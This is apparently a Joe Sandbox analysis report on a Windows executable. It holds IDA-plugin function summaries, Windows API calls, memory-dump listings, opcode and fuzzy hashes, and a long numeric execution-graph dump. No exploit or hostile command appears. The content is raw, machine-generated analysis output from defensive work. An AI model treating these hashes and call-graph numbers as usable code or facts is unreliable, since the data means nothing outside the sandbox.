                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 3248276644-3081826266
                                                                                                                                                                                          • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                                                                                                                          • Instruction ID: 4f97f4adca9055af25af7ef058e1e83d315c20be799ec2f088cafe79a8eb74c9
                                                                                                                                                                                          • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                                                                                                                          • Instruction Fuzzy Hash: DAF0F435115E5326D622323A2C49AAF1A05CEC2324B55453FF891B22C2DF3C89538DBE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00405549
                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 0040559A
                                                                                                                                                                                            • Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                          • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                                                                                                                          • Instruction ID: 85372f17a9103eb01fcdfd8a19690b8d052d76dd043ca16804f8a0d8951f02ed
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                                                                                                                          • Instruction Fuzzy Hash: 53017171200609BFDF309F51DD80AAB362AFB84750F540437FA047A1D5C7B98D52AE69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406660,80000002), ref: 00406435
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00406440
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                                                                          • String ID: : Completed
                                                                                                                                                                                          • API String ID: 3356406503-2954849223
                                                                                                                                                                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                                                                                          • Instruction ID: 441e6d046e2572fd66e4c77006f0a98464fe89a944563537cf106c849ea921cc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F017172500209ABDF218F51CD05EDB3BA9EB54354F01403AFD1992191D738D968DF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B36,00403A4C,?,?,00000008,0000000A,0000000C), ref: 00403B78
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00403B7F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B5E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 1100898210-3081826266
                                                                                                                                                                                          • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                                                                                                                                          • Instruction ID: 6899552f53244e150386b1952d758f3f927a5bb415edc3c38dc9ad64461d36a3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                                                                                                                                          • Instruction Fuzzy Hash: 59E08C3250102057CA211F05ED04B1AB7B8AF45B27F06452AE8407B26287B42C838FD8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E42
                                                                                                                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E52
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                                                                          • API String ID: 2709904686-224404859
                                                                                                                                                                                          • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                                                                                          • Instruction ID: eba18341e72c17137544591cfc51a7e4cac6184970473274e9d14fc4341c5a90
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29D0A7F3400A30DAC3127708EC00D9F77ACEF16700746443AE580A7165D7785D818AEC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F9E
                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAF
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                          • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                                                                                          • Instruction ID: baa81b9806bcf2d0018ef5e19b9a589e3df5f1c452cb3fab7a363fd504aebd5e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                                                                                          • Instruction Fuzzy Hash: 87F0C231105914EFCB029BA5CE00D9EBFA8EF15254B2100BAE840F7250D638DE019BA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:3.3%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:3.7%
                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                          Total number of Limit Nodes:111
                                                                                                                                                                                          execution_graph 97032 731033 97037 7368b4 97032->97037 97036 731042 97045 73bf73 97037->97045 97042 7369bf 97043 731038 97042->97043 97053 736b14 8 API calls __fread_nolock 97042->97053 97044 750413 29 API calls __onexit 97043->97044 97044->97036 97054 75017b 97045->97054 97047 73bf88 97063 75014b 97047->97063 97049 736922 97050 73589f 97049->97050 97078 7358cb 97050->97078 97053->97042 97055 75014b ___std_exception_copy 97054->97055 97056 75016a 97055->97056 97059 75016c 97055->97059 97072 75521d 7 API calls 2 library calls 97055->97072 97056->97047 97058 7509dd 97074 753614 RaiseException 97058->97074 97059->97058 97073 753614 RaiseException 97059->97073 97062 7509fa 97062->97047 97064 750150 ___std_exception_copy 97063->97064 97065 75016a 97064->97065 97068 75016c 97064->97068 97075 75521d 7 API calls 2 library calls 97064->97075 97065->97049 97067 7509dd 97077 753614 RaiseException 97067->97077 97068->97067 97076 753614 RaiseException 97068->97076 97071 7509fa 97071->97049 97072->97055 97073->97058 97074->97062 97075->97064 97076->97067 97077->97071 97079 7358be 97078->97079 97080 7358d8 97078->97080 97079->97042 97080->97079 97081 7358df RegOpenKeyExW 97080->97081 97081->97079 97082 7358f9 RegQueryValueExW 97081->97082 97083 73591a 97082->97083 97084 73592f RegCloseKey 97082->97084 97083->97084 97084->97079 97085 7336f5 97088 73370f 97085->97088 97089 733726 97088->97089 97090 73372b 97089->97090 97091 73378a 97089->97091 97128 733788 97089->97128 97092 733804 PostQuitMessage 97090->97092 97093 733738 97090->97093 97095 773df4 97091->97095 97096 733790 97091->97096 97122 733709 97092->97122 97097 733743 97093->97097 97098 773e61 97093->97098 97094 73376f DefWindowProcW 97094->97122 97147 732f92 10 API calls 97095->97147 97100 733797 97096->97100 97101 7337bc SetTimer RegisterWindowMessageW 97096->97101 97104 73380e 97097->97104 97105 73374d 97097->97105 97160 79c8f7 65 API calls ___scrt_fastfail 97098->97160 97102 773d95 97100->97102 97103 7337a0 KillTimer 97100->97103 97106 7337e5 CreatePopupMenu 97101->97106 97101->97122 97115 773dd0 MoveWindow 97102->97115 97116 773d9a 97102->97116 97140 733907 97103->97140 97133 74fcad 97104->97133 97110 773e46 97105->97110 97111 733758 97105->97111 97106->97122 97108 773e15 97148 74f23c 40 API calls 97108->97148 97110->97094 97159 791423 8 API calls 97110->97159 97120 733763 97111->97120 97121 7337f2 97111->97121 97112 773e73 97112->97094 97112->97122 97115->97122 97117 773da0 97116->97117 97118 773dbf SetFocus 97116->97118 97117->97120 97123 773da9 97117->97123 97118->97122 97120->97094 97130 733907 Shell_NotifyIconW 97120->97130 97145 73381f 75 API calls ___scrt_fastfail 97121->97145 97146 732f92 10 API calls 97123->97146 97128->97094 97129 733802 97129->97122 97131 773e3a 97130->97131 97149 73396b 97131->97149 97134 74fcc5 ___scrt_fastfail 97133->97134 97135 74fd4b 97133->97135 97161 7361a9 97134->97161 97135->97122 97137 74fd34 KillTimer SetTimer 97137->97135 97138 74fcec 97138->97137 97139 78fe2b Shell_NotifyIconW 97138->97139 97139->97137 97141 7337b3 97140->97141 97142 733919 ___scrt_fastfail 97140->97142 97144 7359ff DeleteObject DestroyWindow 97141->97144 97143 733938 Shell_NotifyIconW 97142->97143 97143->97141 97144->97122 97145->97129 97146->97122 97147->97108 97148->97120 97150 733996 ___scrt_fastfail 97149->97150 97251 735f32 97150->97251 97153 733a1c 97155 733a3a Shell_NotifyIconW 97153->97155 97156 7740cd Shell_NotifyIconW 97153->97156 97157 7361a9 55 API calls 97155->97157 97158 733a50 97157->97158 97158->97128 97159->97128 97160->97112 97162 7361c6 97161->97162 97163 7362a8 97161->97163 97191 737ad5 97162->97191 97163->97138 97166 7361e1 97196 738577 97166->97196 97167 775278 LoadStringW 97170 775292 97167->97170 97169 7361f6 97171 736203 97169->97171 97178 7752ae 97169->97178 97176 736229 ___scrt_fastfail 97170->97176 97218 73bed9 97170->97218 97171->97170 97172 73620d 97171->97172 97208 736b7c 97172->97208 97180 73628e Shell_NotifyIconW 97176->97180 97178->97176 97179 7752f1 97178->97179 97181 73bf73 8 API calls 97178->97181 97224 74fe6f 51 API calls 97179->97224 97180->97163 97182 7752d8 97181->97182 97222 79a350 9 API calls 97182->97222 97185 775310 97188 736b7c 8 API calls 97185->97188 97186 7752e3 97223 737bb5 8 API calls 97186->97223 97189 775321 97188->97189 97190 736b7c 8 API calls 97189->97190 97190->97176 97192 75017b 8 API calls 97191->97192 97193 737afa 97192->97193 97194 75014b 8 API calls 97193->97194 97195 7361d4 97194->97195 97195->97166 97195->97167 97197 738587 _wcslen 97196->97197 97198 776610 97196->97198 97201 7385c2 97197->97201 97202 73859d 97197->97202 97226 73adf4 97198->97226 97200 776619 97200->97200 97203 75014b 8 API calls 97201->97203 97225 7388e8 8 API calls 97202->97225 97205 7385ce 97203->97205 97207 75017b 8 API calls 97205->97207 97206 7385a5 __fread_nolock 97206->97169 97207->97206 97209 736b93 97208->97209 97210 7757fe 97208->97210 97236 736ba4 97209->97236 97212 75014b 8 API calls 97210->97212 97214 775808 _wcslen 97212->97214 97213 73621b 97217 737bb5 8 API calls 97213->97217 97215 75017b 8 API calls 97214->97215 97216 775841 __fread_nolock 97215->97216 97217->97176 97219 73befc __fread_nolock 97218->97219 97220 73beed 97218->97220 97219->97176 97220->97219 97221 75017b 8 API calls 97220->97221 97221->97219 97222->97186 97223->97179 97224->97185 97225->97206 97227 73ae02 97226->97227 97229 73ae0b __fread_nolock 97226->97229 97227->97229 97230 73c2c9 97227->97230 97229->97200 97231 73c2d9 __fread_nolock 97230->97231 97232 73c2dc 97230->97232 97231->97229 97233 75014b 8 API calls 97232->97233 97234 73c2e7 97233->97234 97235 75017b 8 API calls 97234->97235 97235->97231 97237 736bb4 _wcslen 97236->97237 97238 736bc7 97237->97238 97239 775860 97237->97239 97246 737d74 97238->97246 97241 75014b 8 API calls 97239->97241 97243 77586a 97241->97243 97242 736bd4 __fread_nolock 97242->97213 97244 75017b 8 API calls 97243->97244 97245 77589a __fread_nolock 97244->97245 97247 737d8a 97246->97247 97250 737d85 __fread_nolock 97246->97250 97248 75017b 8 API calls 97247->97248 97249 776528 97247->97249 97248->97250 97249->97249 97250->97242 97252 7339eb 97251->97252 97253 735f4e 97251->97253 97252->97153 97255 79d11f 42 API calls _strftime 97252->97255 97253->97252 97254 775070 DestroyIcon 97253->97254 97254->97252 97255->97153 97256 73105b 97261 7352a7 97256->97261 97258 73106a 97292 750413 29 API calls __onexit 97258->97292 97260 731074 97262 7352b7 __wsopen_s 97261->97262 97263 73bf73 8 API calls 97262->97263 97264 73536d 97263->97264 97293 735594 97264->97293 97266 735376 97300 735238 97266->97300 97269 736b7c 8 API calls 97270 73538f 97269->97270 97306 736a7c 97270->97306 97273 73bf73 8 API calls 97274 7353a7 97273->97274 97312 73bd57 97274->97312 97277 774be6 RegQueryValueExW 97278 774c03 97277->97278 97279 774c7c RegCloseKey 97277->97279 97281 75017b 8 API calls 97278->97281 97280 774c8e _wcslen 97279->97280 97282 7353d2 97279->97282 97280->97282 97290 736a7c 8 API calls 97280->97290 97291 73655e 8 API calls 97280->97291 97321 73b329 97280->97321 97283 774c1c 97281->97283 97282->97258 97318 73423c 97283->97318 97286 774c44 97287 738577 8 API calls 97286->97287 97288 774c5e messages 97287->97288 97288->97279 97290->97280 97291->97280 97292->97260 97327 7722d0 97293->97327 97296 73b329 8 API calls 97297 7355c7 97296->97297 97329 735851 97297->97329 97299 7355d1 97299->97266 97301 7722d0 __wsopen_s 97300->97301 97302 735245 GetFullPathNameW 97301->97302 97303 735267 97302->97303 97304 738577 8 API calls 97303->97304 97305 735285 97304->97305 97305->97269 97307 736a8b 97306->97307 97311 736aac __fread_nolock 97306->97311 97310 75017b 8 API calls 97307->97310 97308 75014b 8 API calls 97309 73539e 97308->97309 97309->97273 97310->97311 97311->97308 97313 73bd71 97312->97313 97317 7353b0 RegOpenKeyExW 97312->97317 97314 75014b 8 API calls 97313->97314 97315 73bd7b 97314->97315 97316 75017b 8 API calls 97315->97316 97316->97317 97317->97277 97317->97282 97319 75014b 8 API calls 97318->97319 97320 73424e RegQueryValueExW 97319->97320 97320->97286 97320->97288 97322 73b338 _wcslen 97321->97322 97323 75017b 8 API calls 97322->97323 97324 73b360 __fread_nolock 97323->97324 97325 75014b 8 API calls 97324->97325 97326 73b376 97325->97326 97326->97280 97328 7355a1 GetModuleFileNameW 97327->97328 97328->97296 97330 7722d0 __wsopen_s 97329->97330 97331 73585e GetFullPathNameW 97330->97331 97332 735898 97331->97332 97333 73587d 97331->97333 97335 73bd57 8 API calls 97332->97335 97334 738577 8 API calls 97333->97334 97336 735889 97334->97336 97335->97336 97339 7355dc 97336->97339 97340 7355ea 97339->97340 97341 73adf4 8 API calls 97340->97341 97342 7355fe 97341->97342 97342->97299 97343 785650 97352 74e3d5 97343->97352 97345 785666 97347 7856e1 97345->97347 97361 74aa65 9 API calls 97345->97361 97350 7861d7 97347->97350 97363 7a3fe1 81 API calls __wsopen_s 97347->97363 97349 7856c1 97349->97347 97362 7a247e 8 API calls 97349->97362 97353 74e3f6 97352->97353 97354 74e3e3 97352->97354 97356 74e429 97353->97356 97357 74e3fb 97353->97357 97364 73b4c8 97354->97364 97359 73b4c8 8 API calls 97356->97359 97358 75014b 8 API calls 97357->97358 97360 74e3ed 97358->97360 97359->97360 97360->97345 97361->97349 97362->97347 97363->97350 97365 73b4d6 97364->97365 97367 73b4dc 97364->97367 97366 73bed9 8 API calls 97365->97366 97365->97367 97366->97367 97367->97360 97368 740ebf 97369 740ed3 97368->97369 97375 741425 97368->97375 97370 740ee5 97369->97370 97371 75014b 8 API calls 97369->97371 97372 78562c 97370->97372 97373 73b4c8 8 API calls 97370->97373 97374 740f3e 97370->97374 97371->97370 97462 7a1b14 8 API calls 97372->97462 97373->97370 97394 74049d messages 97374->97394 97401 742b20 97374->97401 97375->97370 97378 73bed9 8 API calls 97375->97378 97378->97370 97379 78632b 97466 7a3fe1 81 API calls __wsopen_s 97379->97466 97381 741695 97387 73bed9 8 API calls 97381->97387 97381->97394 97382 75014b 8 API calls 97400 740376 messages 97382->97400 97384 73bed9 8 API calls 97384->97400 97385 785cdb 97391 73bed9 8 API calls 97385->97391 97385->97394 97386 78625a 97465 7a3fe1 81 API calls __wsopen_s 97386->97465 97387->97394 97391->97394 97392 7505b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97392->97400 97393 73bf73 8 API calls 97393->97400 97395 750413 29 API calls pre_c_initialization 97395->97400 97396 786115 97463 7a3fe1 81 API calls __wsopen_s 97396->97463 97398 750568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97398->97400 97399 740aae messages 97464 7a3fe1 81 API calls __wsopen_s 97399->97464 97400->97379 97400->97381 97400->97382 97400->97384 97400->97385 97400->97386 97400->97392 97400->97393 97400->97394 97400->97395 97400->97396 97400->97398 97400->97399 97460 741990 280 API calls 2 library calls 97400->97460 97461 741e50 40 API calls messages 97400->97461 97402 742b86 97401->97402 97403 742fc0 97401->97403 97405 787bd8 97402->97405 97406 742ba0 97402->97406 97645 7505b2 5 API calls __Init_thread_wait 97403->97645 97609 7b7af9 97405->97609 97467 743160 97406->97467 97408 742fca 97413 73b329 8 API calls 97408->97413 97417 74300b 97408->97417 97410 787be4 97410->97400 97412 743160 9 API calls 97414 742bc6 97412->97414 97421 742fe4 97413->97421 97415 742bfc 97414->97415 97414->97417 97418 787bfd 97415->97418 97442 742c18 __fread_nolock 97415->97442 97416 787bed 97416->97400 97417->97416 97420 73b4c8 8 API calls 97417->97420 97649 7a3fe1 81 API calls __wsopen_s 97418->97649 97422 743049 97420->97422 97646 750568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97421->97646 97647 74e6e8 280 API calls 97422->97647 97425 787c15 97650 7a3fe1 81 API calls __wsopen_s 97425->97650 97427 742d3f 97428 787c78 97427->97428 97429 742d4c 97427->97429 97652 7b61a2 53 API calls _wcslen 97428->97652 97431 743160 9 API calls 97429->97431 97432 742d59 97431->97432 97436 743160 9 API calls 97432->97436 97443 742dd7 messages 97432->97443 97433 75014b 8 API calls 97433->97442 97434 75017b 8 API calls 97434->97442 97435 743082 97648 74fe39 8 API calls 97435->97648 97441 742d73 97436->97441 97438 742f2d 97438->97400 97441->97443 97449 73bed9 8 API calls 97441->97449 97442->97422 97442->97425 97442->97427 97442->97433 97442->97434 97442->97443 97444 787c59 97442->97444 97477 740340 97442->97477 97443->97435 97445 743160 9 API calls 97443->97445 97448 742e8b messages 97443->97448 97500 7b0fb8 97443->97500 97525 74ac3e 97443->97525 97544 7af94a 97443->97544 97553 7a669f 97443->97553 97558 7b9fe8 97443->97558 97561 7ad653 97443->97561 97581 7a664c 97443->97581 97588 7ba5b2 97443->97588 97594 7c33a3 97443->97594 97599 7bad47 97443->97599 97653 7a3fe1 81 API calls __wsopen_s 97443->97653 97651 7a3fe1 81 API calls __wsopen_s 97444->97651 97445->97443 97448->97438 97604 74e322 97448->97604 97449->97443 97460->97400 97461->97400 97462->97394 97463->97399 97464->97394 97465->97394 97466->97394 97468 7431a1 97467->97468 97469 74317d 97467->97469 97654 7505b2 5 API calls __Init_thread_wait 97468->97654 97476 742bb0 97469->97476 97656 7505b2 5 API calls __Init_thread_wait 97469->97656 97472 7431ab 97472->97469 97655 750568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97472->97655 97473 749f47 97473->97476 97657 750568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97473->97657 97476->97412 97495 740376 messages 97477->97495 97478 750413 29 API calls pre_c_initialization 97478->97495 97479 78632b 97663 7a3fe1 81 API calls __wsopen_s 97479->97663 97481 741695 97486 73bed9 8 API calls 97481->97486 97494 74049d messages 97481->97494 97483 75014b 8 API calls 97483->97495 97484 785cdb 97492 73bed9 8 API calls 97484->97492 97484->97494 97485 78625a 97662 7a3fe1 81 API calls __wsopen_s 97485->97662 97486->97494 97489 73bed9 8 API calls 97489->97495 97490 7505b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97490->97495 97492->97494 97493 73bf73 8 API calls 97493->97495 97494->97442 97495->97478 97495->97479 97495->97481 97495->97483 97495->97484 97495->97485 97495->97489 97495->97490 